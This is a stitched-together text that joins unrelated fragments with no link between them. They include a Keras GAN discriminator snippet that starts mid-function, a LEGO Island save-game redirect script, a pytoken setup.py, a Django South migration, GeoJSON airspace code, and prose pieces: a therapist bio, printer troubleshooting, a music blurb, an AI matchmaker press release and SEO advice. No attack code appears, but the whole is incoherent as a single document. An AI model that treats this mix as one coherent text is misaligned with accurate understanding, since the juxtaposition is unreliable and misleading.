list_f = [64, 128, 256]
# First conv
x = Conv2D(64, (3, 3), strides=(2, 2), name="disc_Conv2D_1", padding="same")(disc_input)
x = LeakyReLU(0.2)(x)
# Next convs
for i, f in enumerate(list_f):
name = "disc_Conv2D_%s" % (i + 2)
x = Conv2D(f, (3, 3), strides=(2, 2), name=name, padding="same")(x)
x = BatchNormalization(axis=bn_axis)(x)
x = LeakyReLU(0.2)(x)
x = Flatten()(x)
x = Dense(1024)(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.2)(x)
def linmax(x):
return K.maximum(x, -16)
def linmax_shape(input_shape):
return input_shape
# More processing for auxiliary Q
x_Q = Dense(128)(x)
x_Q = BatchNormalization()(x_Q)
x_Q = LeakyReLU(0.2)(x_Q)
x_Q_Y = Dense(cat_dim[0], activation='softmax', name="Q_cat_out")(x_Q)
x_Q_C_mean = Dense(cont_dim[0], activation='linear', name="dense_Q_cont_mean")(x_Q)
x_Q_C_logstd = Dense(cont_dim[0], name="dense_Q_cont_logstd")(x_Q)
x_Q_C_logstd = Lambda(linmax, output_shape=linmax_shape)(x_Q_C_logstd)
# Reshape Q to nbatch, 1, cont_dim[0]
x_Q_C_mean = Reshape((1, cont_dim[0]))(x_Q_C_mean)
x_Q_C_logstd = Reshape((1, cont_dim[0]))(x_Q_C_logstd)
x_Q_C = merge([x_Q_C_mean, x_Q_C_logstd], mode="concat", name="Q_cont_out", concat_axis=1)
def minb_disc(z):
diffs = K.expand_dims(z, 3) - K.expand_dims(K.permute_dimensions(z, [1, 2, 0]), 0)
abs_diffs = K.sum(K.abs(diffs), 2)
z = K.sum(K.exp(-abs_diffs), 2)
return z
def lambda_output(input_shape):
return input_shape[:2]
num_kernels = 300
dim_per_kernel = 5
M = Dense(num_kernels * dim_per_kernel, use_bias=False, activation=None)
MBD = Lambda(minb_disc, output_shape=lambda_output)
if use_mbd:
x_mbd = M(x)
x_mbd = Reshape((num_kernels, dim_per_kernel))(x_mbd)
x_mbd = MBD(x_mbd)
x = merge([x, x_mbd], mode='concat')
# Create discriminator model
x_disc = Dense(2, activation='softmax', name="disc_out")(x)
discriminator_model = Model(inputs=[disc_input], outputs=[x_disc, x_Q_Y, x_Q_C], name=model_name)
return discriminator_model
def DCGAN(generator, discriminator_model, cat_dim, cont_dim, noise_dim):
cat_input = Input(shape=cat_dim, name="cat_input")
cont_input = Input(shape=cont_dim, name="cont_input")
noise_input = Input(shape=noise_dim, name="noise_input")
generated_image = generator([cat_input, cont_input, noise_input])
x_disc, x_Q_Y, x_Q_C = discriminator_model(generated_image)
DCGAN = Model(inputs=[cat_input, cont_input, noise_input],
outputs=[x_disc, x_Q_Y, x_Q_C],
name="DCGAN")
return DCGAN
def load(model_name, cat_dim, cont_dim, noise_dim, img_dim, bn_mode, batch_size, dset="mnist", use_mbd=False):
if model_name == "generator_upsampling":
model = generator_upsampling(cat_dim, cont_dim, noise_dim, img_dim, bn_mode, model_name=model_name, dset=dset)
model.summary()
from keras.utils import plot_model
plot_model(model, to_file='../../figures/%s.png' % model_name, show_shapes=True, show_layer_names=True)
return model
if model_name == "generator_deconv":
model = generator_deconv(cat_dim, cont_dim, noise_dim, img_dim, bn_mode,
batch_size, model_name=model_name, dset=dset)
model.summary()
from keras.utils import plot_model
plot_model(model, to_file='../../figures/%s.png' % model_name, show_shapes=True, show_layer_names=True)
return model
if model_name == "DCGAN_discriminator":
model = DCGAN_discriminator(cat_dim, cont_dim, img_dim, bn_mode,
model_name=model_name, dset=dset, use_mbd=use_mbd)
model.summary()
from keras.utils import plot_model
plot_model(model, to_file='../../figures/%s.png' % model_name, show_shapes=True, show_layer_names=True)
return model
if __name__ == '__main__':
m = generator_deconv((10,), (2,), (64,), (28, 28, 1), 2, 1, model_name="generator_deconv", dset="mnist")
m.summary()
|
Greg is a 1992 University of Evansville (IN) graduate with a Bachelor of Science in Physical Therapy. Greg earned NATABOC certification as an Athletic Trainer in 1995. Greg subsequently completed a post-graduate Master of Health Science degree in Physical Therapy at the University of Indianapolis in 2001.
Greg has extensive continuing education in a wide variety of orthopedic, neurological, industrial and sports topics. Greg’s additional specialties include a Certification in Applied Functional Sciences, a WorkWell certification as a Functional Capacity Evaluation Provider, and certification as an Emergency Medical Responder.
Prior to opening this private practice, Greg had practiced in Crystal Lake since 1995. Originally from Southern Indiana, Greg and his family reside in Wonder Lake and are active in church and sports activities. Greg enjoys reading military history and is an avid sports fan.
"""
This file is part of ICU (LEGO Island Configuration Utility)
ICU - A collection of LEGO Island Configuration Tools
Created 2012-2013 Triangle717 <http://triangle717.wordpress.com>
ICU is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ICU is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ICU. If not, see <http://www.gnu.org/licenses/>.
"""
# ICU ReDirect V2
# Part of ICU (LEGO Island Configuration Utility)
# https://github.com/le717/ICU
# General use modules
import os
import sys
import time
# Main use modules
import winreg
import glob
import shutil
# Special purpose modules
import platform
import webbrowser
# Logging Code
import logging
import yourscorecube
# GUI elements
import tkinter
from tkinter import filedialog
# Global variables
app = "ICU ReDirect"
majver = "Version 2.0"
minver = "Stable"
creator = "Triangle717"
game = "LEGO Island"
# ------------ Begin ICU ReDirect Initialization ------------ #
def preload():
'''Python 3.3.0 and Windows Architecture check'''
logging.info("Begin logging to {0}".format(yourscorecube.logging_file))
logging.info('''
#############################################
{0} {1} {2}
Copyright 2013 {3}
YourScoreCube.log
If you run into a bug, open an issue at
https://github.com/le717/ICU/issues
and attach this file for an easier fix!
#############################################
'''.format(app, majver, minver, creator))
# You need to have at least Python 3.3.0 to run ICU ReDirect
if sys.version_info < (3, 3, 0):
logging.warning('''You are not running Python 3.3.0 or higher!
You need to get a newer version to run {0}'''.format(app))
sys.stdout.write('''\nYou need to download Python 3.3.0 or greater
to run {0} {1} {2}.'''.format(app, majver, minver))
# Don't open browser immediately
time.sleep(2)
logging.info("Open Python download page in a new tab in web browser.")
# New tab, raise browser window (if possible)
webbrowser.open_new_tab("http://python.org/download")
# Close ICU ReDirect
logging.info("Display error message for three seconds")
time.sleep(3)
logging.info("{0} is shutting down.".format(app))
raise SystemExit(0)
# If you are running Python 3.3.0
else:
logging.info('''You are running Python 3.3.0 or greater.
{0} will continue.'''.format(app))
# Declare osbit global variable
global osbit
# User is running 64-bit Windows
if platform.machine() == 'AMD64':
logging.info("User is running 64-bit Windows.")
osbit = "x64"
main()
# User is running 32-bit Windows
elif platform.machine() == 'x86':
logging.info("User is running 32-bit Windows.")
osbit = "x86"
main()
# The user is running an unsupported version of Windows!
else:
logging.warning("User is running an unsupported OS!")
print("\nYou are running an unsupported OS! {0} will now close."
.format(app))
time.sleep(3)
logging.info("{0} is shutting down".format(app))
raise SystemExit(0)
# ------------ End ICU ReDirect Initialization ------------ #
# ------------ Begin ICU ReDirect Menu Layout ------------ #
def main():
'''ICU ReDirect Menu Layout'''
print("\nWelcome to {0} {1} {2}\nCreated 2012-2013 {3}".format(
app, majver, minver, creator))
print('''\nPlease make a selection:\n
[r] ReDirect Save Games
[q] Quit''')
menuopt = input("\n> ")
while True:
if menuopt.lower() == "r":
logging.info("User pressed '[r] ReDirect Save Games'")
ReDirect()
elif menuopt.lower() == "q":
logging.info("User pressed '[q] Quit'")
print("\nGoodbye!")
time.sleep(3)
logging.info('''{0} is shutting down.
'''.format(app))
raise SystemExit(0)
# Undefined input
else:
logging.info("User pressed an undefined key")
main()
# ------------ End ICU ReDirect Menu Layout ------------ #
# ------------ Begin Save Game ReDirect Intro ------------ #
def ReDirect():
'''Save Game ReDirect Launcher'''
# Switch to 32-bit registry string code
if osbit == "x86":
logging.info("User is running 32-bit (x86) Windows, use x86 Registry Strings")
eightsixReDirect()
# Switch to 64-bit registry string code
elif osbit == 'x64':
logging.info("User is running 64-bit (x64) Windows, use x64 Registry Strings")
sixfourReDirect()
# ------------ End Save Game ReDirect Intro ------------ #
# ------------ Begin Save Game ReDirect code for Windows x86 ------------ #
def eightsixReDirect():
'''Redirects LEGO Island Save Games on Windows x86'''
logging.info("'Open HKEY_LOCAL_MACHINE\SOFTWARE\Mindscape\LEGO Island\savepath' for reading")
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Mindscape\LEGO Island', 0, winreg.KEY_READ) as oldx86save:
oldx86path = winreg.QueryValueEx(oldx86save, 'savepath')
# Convert tuple to str(ing)
logging.info("Convert tuple returned by registry string to a string")
oldx86path = "".join(str(oldx86path))
# Clean up string to get a clean folder path
logging.info("Cleaning up folder path...")
oldx86path = oldx86path.strip("(''), 1")
# Tell where current save games are located
logging.info("Your {0} Save Games are currently located at {1}".format(game,
oldx86path))
print('\nYour {0} Save Games are currently located at\n"{1}"'.format(game,
oldx86path))
time.sleep(2)
# Draw (then withdraw) the root Tk window
logging.info("Drawing root Tk window")
root = tkinter.Tk()
logging.info("Withdrawing root Tk window")
root.withdraw()
# Select where you want your Save Games to be moved to
# TODO: Make dialog active window automatically and
# do the same to main window when closed.
logging.info("Display folder selection dialog for new Save Game Location.")
newsavepath = filedialog.askdirectory(
title="Please select the new location for your {0} Save Games:".format(
game))
# The user clicked cancel
if len(newsavepath) == 0:
logging.warning("User canceled the Save Game redirection!")
print("\nCanceling Save Game ReDirection...\n")
time.sleep(1)
main()
# The user selected a folder
else:
logging.info("User selected a new Save Game location at {0}".format(
newsavepath))
try:
# This checks for any *.GS files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsfile in files:
if gsfile.upper().endswith(".GS"):
os.unlink(os.path.join(newsavepath, gsfile))
# This checks for any *.gsi files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsifile in files:
if gsifile.lower().endswith(".gsi"):
os.unlink(os.path.join(newsavepath, gsifile))
# Move all *.GS files to the new path
for gsfile in glob.glob("{0}/*.GS".format(oldx86path)):
shutil.move(gsfile, newsavepath)
# Move all *.gsi files to the new path
for gsifile in glob.glob("{0}/*.gsi".format(oldx86path)):
shutil.move(gsifile, newsavepath)
'''So the final workflow is: if file exists: delete, then move.
if not exists: move'''
# Write Registry String with new path
logging.info("'Write HKEY_LOCAL_MACHINE\SOFTWARE\Mindscape\LEGO Island\savepath' with new save path")
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Mindscape\LEGO Island') as newx86savekey:
winreg.SetValueEx(newx86savekey, "savepath",
0, winreg.REG_SZ, newsavepath)
            # Save games successfully redirected! :D
            print('\n{0} save games successfully redirected to "{1}".'.format(game,
newsavepath))
# The User does not have the rights to redirect the save games! D:
except PermissionError:
logging.warning('''{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
print('''\n{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
# Go back to main menu no matter the outcome
finally:
time.sleep(3)
main()
# ------------ End Save Game ReDirect code for Windows x86 ------------ #
# ------------ Begin Save Game ReDirect code for Windows x64 ------------ #
def sixfourReDirect():
'''Redirects LEGO Island Save Games on Windows x64'''
logging.info("'Open HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mindscape\LEGO Island\savepath' for reading")
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Wow6432Node\Mindscape\LEGO Island', 0,
winreg.KEY_READ) as oldx64save:
oldx64path = winreg.QueryValueEx(oldx64save, 'savepath')
# Convert tuple to str(ing)
logging.info("Convert tuple returned by registry string to a string")
oldx64path = "".join(str(oldx64path))
# Clean up string to get a clean folder path
logging.info("Cleaning up folder path...")
oldx64path = oldx64path.strip("(''), 1")
# Tell where current save games are located
logging.info("Your {0} Save Games are currently located at {1}".format(game,
oldx64path))
print('\nYour {0} Save Games are currently located at\n"{1}"'.format(game,
oldx64path))
time.sleep(2)
# Draw (then withdraw) the root Tk window
logging.info("Drawing root Tk window")
root = tkinter.Tk()
logging.info("Withdrawing root Tk window")
root.withdraw()
# Select where you want your Save Games to be moved to
# TODO: Make dialog active window automatically
# and do the same to main window when closed.
logging.info("Display folder selection dialog for new Save Game Location.")
newsavepath = filedialog.askdirectory(
title="Please select the new location for your {0} Save Games:".format(
game))
# The user clicked cancel
if len(newsavepath) == 0:
logging.warning("User canceled the Save Game redirection!")
print("\nCanceling Save Game ReDirection...\n")
time.sleep(1)
main()
# The user selected a folder
else:
logging.info("User selected a new Save Game location at {0}".format(
newsavepath))
try:
# This checks for any *.GS files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsfile in files:
if gsfile.upper().endswith(".GS"):
os.unlink(os.path.join(newsavepath, gsfile))
# This checks for any *.gsi files in savepath, and deletes them
# This has to be done because Windows does not allow
# a file to be overwritten. :|
for root, dir, files in os.walk(newsavepath):
for gsifile in files:
if gsifile.lower().endswith(".gsi"):
os.unlink(os.path.join(newsavepath, gsifile))
# Move all *.GS files to the new path
for gsfile in glob.glob("{0}/*.GS".format(oldx64path)):
shutil.move(gsfile, newsavepath)
# Move all *.gsi files to the new path
for gsifile in glob.glob("{0}/*.gsi".format(oldx64path)):
shutil.move(gsifile, newsavepath)
'''So the final workflow is: if file exists: delete, then move.
if not exists: move'''
# Write Registry String with new path
logging.info("'Write HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mindscape\LEGO Island\savepath' with new save path")
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\Wow6432Node\Mindscape\LEGO Island') as newx64savekey:
winreg.SetValueEx(newx64savekey, "savepath",
0, winreg.REG_SZ, newsavepath)
            # Save games successfully redirected! :D
            print('\n{0} save games successfully redirected to "{1}".'.format(game,
newsavepath))
# The User does not have the rights to redirect the save games! D:
except PermissionError:
logging.warning('''{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
print('''\n{0} does not have the user rights to operate!
Please relaunch {0} as an Administrator.'''.format(app))
# Go back to main menu no matter the outcome
finally:
time.sleep(3)
main()
# ------------ End Save Game ReDirect code for Windows x64 ------------ #
if __name__ == "__main__":
# Write window title (since there is no GUI)
os.system("title {0} {1} {2}".format(app, majver, minver))
# Run preload() to begin ICU ReDirect Initialization
preload() |
Epson Stylus CX troubleshooting: if error code E appears on the control panel display, the print head is unable to move. This usually means the shipping packing materials were never removed, or the ink cartridge cover is not completely closed.
Follow these steps to remove the packing materials: Turn off the Stylus CX. Lift up the scanner to access the printer area. Remove any packing materials. Press down on the ink cartridge cover to make sure it is completely closed; if it is not, the print head may have trouble moving back and forth. Lower the scanner and turn the Stylus CX back on.
import sys
import os
import pdb
import shutil
import os.path
from distutils.command.clean import clean as _clean
from distutils.core import setup, Extension
from distutils import sysconfig
##################################################################
def customize_compiler2(compiler):
(cc, cxx, opt, cflags, ccshared, ldshared, so_ext) = \
sysconfig.get_config_vars('CC', 'CXX', 'OPT', 'CFLAGS',
'CCSHARED', 'LDSHARED', 'SO')
if 0:
print "cc=", cc
print "cxx=", cxx
print "opt=", opt
print "cflags=", cflags
print "ccshared=", ccshared
cflags = cflags.replace("-DNDEBUG", "")
cflags = cflags.replace("-O2", "")
cpp = cc + " -E"
cc_cmd = cc + ' ' + cflags
compiler.set_executables(
preprocessor=cpp,
compiler=cc_cmd,
compiler_so=cc_cmd + ' ' + ccshared,
compiler_cxx=cxx,
linker_so=ldshared,
linker_exe=cc)
compiler.shared_lib_extension = so_ext
return
idx = None
for i, arg in enumerate(sys.argv):
if arg == "-debug":
idx = i
if idx:
sys.argv.pop(idx)
d = sysconfig.__dict__
d['customize_compiler'] = customize_compiler2
##################################################################
##
## the main module - escape
##
##################################################################
escape_module = Extension('escape',
sources = ['escapemodule.c'])
mlist = [escape_module]
##################################################################
##
## benchmark support - most folks won't need this
##
##################################################################
idx = None
for i, arg in enumerate(sys.argv):
if arg == "-bmark":
idx = i
if idx:
sys.argv.pop(idx)
slist = ["bmarkmodule.c", "bmark_scan.c"]
obj = Extension("bmark", sources=slist)
mlist.append(obj)
# does distutils have a way to run flex?
cmd = "flex -f -s -B -L -obmark_scan.c -Pbmark bmark_scan.lex"
print "Running flex command"
print cmd
c = os.system(cmd)
if c != 0:
print "Flex return non-zero status. Stopping."
sys.exit(-1)
##################################################################
##
## custom clean func
##
##################################################################
class clean(_clean):
"""Custom clean routine to clean pyc files"""
def run(self):
_clean.run(self)
if os.path.exists("build"):
print "Removing build dir"
shutil.rmtree("build")
for f in os.listdir("."):
if f.endswith(".pyc") \
or f.endswith("~") \
or f.endswith(".s") \
or f.endswith(".o") \
or f in ("a.out", "pytoken.tar.gz"):
os.unlink(f)
for f in ["parser.out", "parsetab.py"]:
try:
os.unlink(f)
except OSError:
pass
return
pass
##################################################################
##
## toplevel
##
##################################################################
## how can I force setup to turn off -O ??
##
setup(name = 'pytoken',
version = '1.01',
description = 'Generates scanners for python.',
author = 'Ram Bhamidipaty',
author_email = 'rambham@gmail.com',
url = 'http://code.google.com/p/pytoken/',
ext_modules = mlist,
py_modules = ['pytoken', 'pytoken_ply_lex'],
cmdclass = {"clean" : clean} )
|
Not surprisingly, we are big fans of the music of Liz Harris. Mirroring, who released an album earlier this year, paired Harris with Tiny Vipers’ Jesy Fortino. Her work as Grouper has ranged from the ethereal to the jarringly surreal; 2011’s A I A (released on CD by Kranky this year) is probably the best overview of her work as a whole.
Kranky will be releasing the next Grouper album in February. It’s called The Man Who Died In His Boat, and — if the song “Vital” is any indication — will likely fall somewhat on the “accessible” side of Harris’s discography. Alternately: it’s haunting but not terrifying. |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Don't use "from appname.models import ModelName".
# Use orm.ModelName to refer to models in this application,
# and orm['appname.ModelName'] for models in other applications.
Site = orm['sites.Site']
all_sites = Site.objects.all()
for ad in orm.AdBase.objects.all():
ad.sites = all_sites
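            # Assigning to the M2M manager writes the through table
            # immediately in this Django/South era; no ad.save() is needed.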
def backwards(self, orm):
"Write your backwards methods here."
models = {
'adzone.adbase': {
'Meta': {'object_name': 'AdBase'},
'advertiser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.Advertiser']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdCategory']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'since': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sites.Site']", 'symmetrical': 'False'}),
'start_showing': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'stop_showing': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(9999, 12, 29, 0, 0)'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'zone': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdZone']"})
},
'adzone.adcategory': {
'Meta': {'ordering': "('title',)", 'object_name': 'AdCategory'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'adzone.adclick': {
'Meta': {'object_name': 'AdClick'},
'ad': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdBase']"}),
'click_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'})
},
'adzone.adimpression': {
'Meta': {'object_name': 'AdImpression'},
'ad': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['adzone.AdBase']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impression_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'source_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'})
},
'adzone.advertiser': {
'Meta': {'ordering': "('company_name',)", 'object_name': 'Advertiser'},
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'adzone.adzone': {
'Meta': {'ordering': "('title',)", 'object_name': 'AdZone'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'adzone.bannerad': {
'Meta': {'object_name': 'BannerAd', '_ormbases': ['adzone.AdBase']},
'adbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['adzone.AdBase']", 'unique': 'True', 'primary_key': 'True'}),
'content': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'})
},
'adzone.textad': {
'Meta': {'object_name': 'TextAd', '_ormbases': ['adzone.AdBase']},
'adbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['adzone.AdBase']", 'unique': 'True', 'primary_key': 'True'}),
'content': ('django.db.models.fields.TextField', [], {})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['adzone']
symmetrical = True
|
DENVER, CO – 12-20-2018 (PRDistribution.com) — Kevin Teman, through his own personal struggles with finding a partner, created the world’s first talking artificially intelligent matchmaker, which operates entirely by speaking with you (through an AI voice).
Paired with its recent world news break (AFP), AIMM announces its national expansion, starting in California. Kevin Teman’s approach of combining human matchmaking techniques with talking artificial intelligence has already begun changing the dating world; it was hand-picked by Robert Downey Jr’s team and featured in Robert’s new docu-series airing on YouTube Red in Summer 2019 (Age of AI). The series, considered to be YouTube Red’s flagship product, calls Kevin “a leader in AI”.
“Most of us have suffered through dating apps and sites for many years,” Kevin Teman says, “maybe our entire single lives. Although many of us, if we’re smart, have withdrawn from dating apps entirely.”
Teman says even the best dating apps have become disrespectful, ineffective and childish. “Wading through fake profiles, dealing with less-than-stellar company morals, profit schemes, using apps that feel like they were made for kids,” Teman says, “one is left feeling utterly disrespected by the process and the companies themselves.”
“I have a strong dislike for the dating industry,” Kevin says. “Its standards are incredibly low, and very little has been done to help the problems. Mostly each new app chimes in for another piece of your money. It absolutely needs to change.”
“Self-respecting adults,” Kevin says, “long for solutions that are effective and feel grown up, straight-forward.” Flirts, winks, roses, virtual gifts and other junk, Teman says, “detract from real human connections and push us into a fake online world. This is not how online dating should have ever been.”
In Kevin’s struggle through dating apps and other services to meet his own life partner, he eventually turned to human matchmaking: that’s right, a real human person. Having learned of matchmaking through discussions with friends in dating companies, Kevin found that his engagement in human matchmaking opened his eyes to a new world. “This world of effective matchmaking techniques, hand-holding, building people up to each other, getting them excited about each other,” Kevin said, “felt day-and-night compared to dating apps. How could two industries have such drastically different approaches to the same goal?” Something felt awry. Matchmaking services give deep, wonderful introductions, facilitate the start of your relationship, hold your hand, and are respectful, while dating apps drop you in a complicated situation and leave you to your own devices.
But matchmaking services cost enormous amounts of money, in the tens of thousands, to experience yourself. This is where AIMM comes in: AIMM facilitates the start of a relationship for you using the same effective matchmaking techniques for very low cost, essentially the distributed cost of maintaining the AI.
AIMM has amassed 1,000 users in Denver, Colorado through its grass-roots advertising, primarily through radio and local events in Denver. But that hasn’t stopped national press from recognizing AIMM. With its recent world-news break through Agence France-Presse and L’Express, and endorsements from Robert’s documentary, AIMM is announcing its national expansion, starting in California.
“AIMM started as a ‘grass-roots’ effort primarily headed by myself,” says Kevin, “and largely so that I could find someone for myself.” With some big names recently providing their support, AIMM’s team is expanding, and AIMM foresees a speeding up of growth over the next year as it expands first to California and other states.
“Human matchmaking opened the door to a new world for me. I want to give that back to everyone through AIMM so they can experience the same effective techniques I did,” says Teman.
For the original news story, please visit https://prdistribution.com/news/aimm-worlds-first-talking-ai-matchmaker-featured-in-robert-downey-jrs-upcoming-docu-series-on-artificial-intelligence.html. |
import geojson
import json
import os
from geojson import Feature, FeatureCollection
from .config import json_dir, geojson_dir
from .utils import read_json, write_file_contents
from .geom import sort_geojson
def make_features(border, process_raw_geometry):
print '---\nMaking features'
features = list()
for filename in os.listdir(json_dir):
json_file = os.path.join(json_dir, filename)
data = read_json(json_file)
for d in data:
if d['geom_raw'] == 'Lateral limits as for Budapest FIR': # TODO
continue
if d['geom_raw'] == 'along border AUSTRIA_HUNGARY then a clokwise arc radius centered on 7.6 KM 474052N 0164600E': # TODO
continue
geom = process_raw_geometry(d['geom_raw'], border)
# making union when geom_raw_union is present
if 'geom_raw_union' in d:
geom_and = process_raw_geometry(d['geom_raw_union'], border)
geom = geom.union(geom_and)
properties = {k: v for k, v in d.iteritems() if not k.startswith('geom')}
feature = Feature(geometry=geom, id=1, properties=properties)
features.append(feature)
return features
def write_geojsons(features):
classes = {f['properties']['class'] for f in features}
for cl in classes:
fc = FeatureCollection([f for f in features if f['properties']['class'] == cl])
geojson_data = sort_geojson(json.loads(geojson.dumps(fc)))
body = json.dumps(geojson_data, ensure_ascii=False, indent=2, sort_keys=True)
write_file_contents(os.path.join(geojson_dir, '{}.geojson'.format(cl)), body)
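# Illustrative pipeline usage (a sketch; the border object and the
# process_raw_geometry parser come from elsewhere in this package):
#   features = make_features(border, process_raw_geometry)
#   write_geojsons(features)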
|
Your text is not the only front-end content on your website that contributes to SEO. Images and videos can also help you gain rank, establish relevance, or reach ranking positions more quickly.
This step will discuss several different ways that media can either help or hinder your ranking in search engines and how to leverage that as much as you can. It will differ quite a bit from one genre to the next, so just take these tips as generalities around Search Engine Optimising media in the ‘ideal world’.
You’ve probably noticed in Google search that you can filter for images and videos; that’s reflected in Google Search Console as separate search data.
Websites in some genres can gain significant volumes of traffic from those sources.
For every image you plan to upload and use in your website, name them with human-readable text names like ‘green t-shirt with Nike logo’ for example, or maybe: ‘man holding custom safety sign’.
Whatever description is most appropriate for your product, label it with just enough words to make it clear what the image is about. Imagine it like this: if you had to describe the content of an image as quickly as possible to a blind person, the description you’d come up with would probably be suitable as the image name.
For those of you who love to keep your images in some kind of naming order, you’ll probably hate this concept, but this is a best practice for SEO, especially if you have to deal with a lot of images, like in an eCommerce store.
